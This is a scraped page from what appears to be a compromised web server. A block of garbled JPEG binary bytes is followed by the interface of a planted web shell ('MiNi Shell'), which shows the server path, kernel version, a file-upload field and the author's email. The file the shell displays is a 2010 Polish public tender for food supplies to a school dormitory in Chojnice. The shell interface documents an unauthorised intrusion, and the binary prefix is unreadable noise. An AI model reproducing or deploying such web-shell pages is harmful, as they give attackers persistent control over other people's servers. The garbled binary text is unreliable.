JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101115/368112-N-2010.html

<p class="kh_header"><b>Chojnice: dostawa artykułów spożywczych</b><br>
<b>Numer ogłoszenia: 368112 - 2010; data zamieszczenia: 15.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowa Bursa dla Młodzieży Szkolnej , ul. Świętopełka 1, 89-620 Chojnice, woj. pomorskie, tel. 0-52 3972996, faks 0-52 3972996.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bursa.chojnice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawa artykułów spożywczych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Lp.	Nazwa asortymentu	Gramatura	Jednostka
miary	Ilość w skali
12 m-cy
1	Ananasy konserwowe plastry	565g	szt	140
2	Batonik toffi w czekoladzie	51g	szt	400
3	Batonik z orzeszkami	42g	szt	600
4	Budyń	65g	szt	30
5	Chrzan tarty	200g	szt	20
6	Ciastka kruche	1kg	kg	20
7	Cukier biały kryształ	1kg	kg	600
8	Cukier waniliowy	16g	szt	150
9	Cukierki czekoladowe	1kg	kg	7
10	Cukierki owocowe	1kg	kg	7
11	Czekolada z dodatkami	100g	szt	200
12	Drożdże	100g	szt	20
13	Dżem czarna porzeczka	280g	szt	800
14	Dżem truskawkowy	280g	szt	1000
15	Dżem wiśniowy	280g	szt	900
16	Dżem jagodowy	280g	szt	400
17	Dżem brzoskwiniowy	280g	szt	900
18	Fasola sucha	500g	szt.	130
19	Fasolka konserwowa w słoiku	470g
po odcieku
260g	szt	200
20	Fasolka konserwowa czerwona	400g	szt	30
21	Groch suchy	500g	szt	100
22	Groch konserwowy
Skład: groszek zielony, woda, sól.
 Wartość odżywcza w 100g wyrobu 64 kcal	400g
po odcieku
240g	szt	550
23	Herbata indyjska	100g	szt	220
24	Jajka kurze(klasa L*	szt	szt	5800
25	Kakao ciemne niskotłuszczowe
10%-12% tłuszczu	200g	szt	150
26	Kasza jęczmienna z zastosowaniem 
do zup i II dań	1kg	kg	100
27	Kasza manna	1kg	Kg	5
28	Kawa inka	150g	szt	50
29	Ketchup 	500g	szt	300
30	Kompot agrestowy	900ml	szt	50
31	Koncentrat pomidorowy 30%	900ml	szt	220
32	Koper susz	6g	szt	50
33	Kukurydza konserwowa
Skład: kukurydza, woda, sól, cukier
Wartość odżywcza 100g produktu 115kcal, białko 3,9g, węglowodany przyswajalne 22g, tłuszcz całkowity 1,3g,	400g
po odcieku
220g	szt	270
34	Kwasek cytrynowy	20g	szt	130
35	Kawa naturalna	500g	szt	10
36	Kawa rozpuszczalna	100g	Szt	5
37	Liść laurowy	10g	szt	70
38	Majeranek	10g	szt	200
39	Majonez
Skład:olej roślinny, woda, ocet spirytusowy, cukier, żółtko kurze w proszku 2,2%, sól, gorczyca	620ml	szt	150
40	Makaron, po ugotowaniu nie lepiący się, odpowiednio twardy, sprężysty, zachowuje naturalny zapach i kolor
Skład: mąka makaronowa pszenna, woda, substancja wzbogacająca-witamina A. 600wartość energetyczna w 100g 336 kcal	500g	szt	640
41	Margaryna do pieczenia 	250g	szt	30
42	Margaryna do pieczywa 
zawartość tłuszczu 60%
Skład: roślinne oleje 37%, w tym min 5% ol.słon  i tłuszcze, woda, maślanka, emulgatory, sól, substancje konserwujące, Wit. A,D3, E, aromat, barwnik	500g	szt	600
43	Marmolada wieloowocowa	1000g	szt	20
44	Mąka pszenna typ 500
Zastosowanie: jako zawiesina do zup i sosów, do pieczenia ciast,	1kg	1kg	400
45	mąka ziemniaczana	1kg	1kg	100
46	Miód sztuczny	350g	szt	10
47	Musztarda
Skład: woda, gorczyca, ocet spirytusowy, cukier, sól, przyprawy	200g	1 szt	80
48	Masło czekoladowe do pieczywa	350g	szt	30
49	Ocet	500ml	szt	110
50	Ogórki konserwowe	900ml	szt	170
51	Olej uniwersalny	1000ml	szt	290
52	Papryka konserwowa	900ml	szt	30
53	Papryka sucha	20g	szt	120
54	Pieprz mielony	20g	szt	250
55	Pieprz ziarnisty	15g	szt	100
56	Proszek do pieczenia	30g	szt	120
57	Przyprawa bazylia	10g	szt	70
58	Przyprawa warzywna	1kg	szt	90
59	Przyprawa do kurczaka	20g	szt	50
60	Przyprawa jarzynka	200g	szt	20
61	Przyprawa oregano	10g	szt	80
62	Przyprawa do gyrosa	20g	szt.	120
63	Przyprawa w płynie do zup i sosów
Skład: woda, sól, substancja wzmacniająca smak i zapach: glutaminian sodu: barwnik: karmel E 150c: regulator kwasowości: kwas cytrynowy: ekstrakt z lubczyka, aromat.	860ml
netto	szt	50
64	Płatki kukurydziane 
Skład: kukurydza 98%	500g	szt	30
65	Płatki śniadaniowe w różnych smakach
z pełnego ziarna	250g	szt	50
66	Rodzynki	200g	szt	80
67	Rodzynki w czekoladzie	80g	szt	150
68	Ryż	1kg	kg	380
69	Sałatka szwedzka	840g	szt	100
70	Sos do spaghetti	350g	szt	20
71	Sos pieczarkowy w proszku	27g	szt	150
72	Sos pieczeniowy ciemny w proszku	27g	szt	100
73	Sos sałatkowy (różne smaki)	9g	szt	170
74	Sos słodko-kwaśny	300g	szt	350
75	Sosy w różnych smakach	300g	szt	70
76	Sól	1kg	kg	150
77	Syrop do napojów
Skład: cukier, syrop glukozowo-fruktozowy, woda, zagęszczony sok, kwas cytrynowy, aromat, kwas askorbinowy, przeciwutleniacz
Wartość energet. w 100ml syropu 348 kcal	500ml	szt	1300
78	Wafel przekładany kremem kakaowym w czekoladzie paczkowany, czekolada 28,5 %	39g	szt	600
79	Woda mineralna niegazowana	1500ml	Szt	100
80	Woda mineralna niegazowana	500ml	Szt	550
81	Ziele angielskie	20g	szt	70
82	Zupa pieczarkowa	40g	szt	360
83	Żur naturalny zagęszczany
Skład: woda, mąka żytnia żurkowa (zawiera gluten) mąka pszenna, zakwas, czosnek.
Produkt naturalny otrzymany na drodze fermentacji mlekowej, pasteryzowany.	460g	szt	190

* mają być zgodne z obowiązującymi normami w opakowaniach (wytłoczkach do 30szt) do dostawy każdorazowo dołączony ma być certyfikat terminu przydatności do spożycia, którego czas nie może być krótszy niż 21 dni od daty dostawy.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-0, 15.40.00.00-2, 15.80.00.00-6, 01.20.00.00-9, 14.40.00.00-5, 15.90.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>b)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnieniu warunków udziału w postępowaniu określonym w art. 22 Prawa Zamówień Publicznych</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnieniu warunków udziału w postępowaniu określonym w art. 22 Prawa Zamówień Publicznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnieniu warunków udziału w postępowaniu określonym w art. 22 Prawa Zamówień Publicznych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnieniu warunków udziału w postępowaniu określonym w art. 22 Prawa Zamówień Publicznych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bursa .chojnice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowa Bursa dla Młodzieży Szkolnej w Chojnicach
ul. Świętopełka 1 89-620 Chojnice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.11.2010 godzina 07:30, miejsce: Powiatowa Bursa dla Młodzieży Szkolnej w Chojnicach
ul. Świętopełka 1 89-620 Chojnice.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com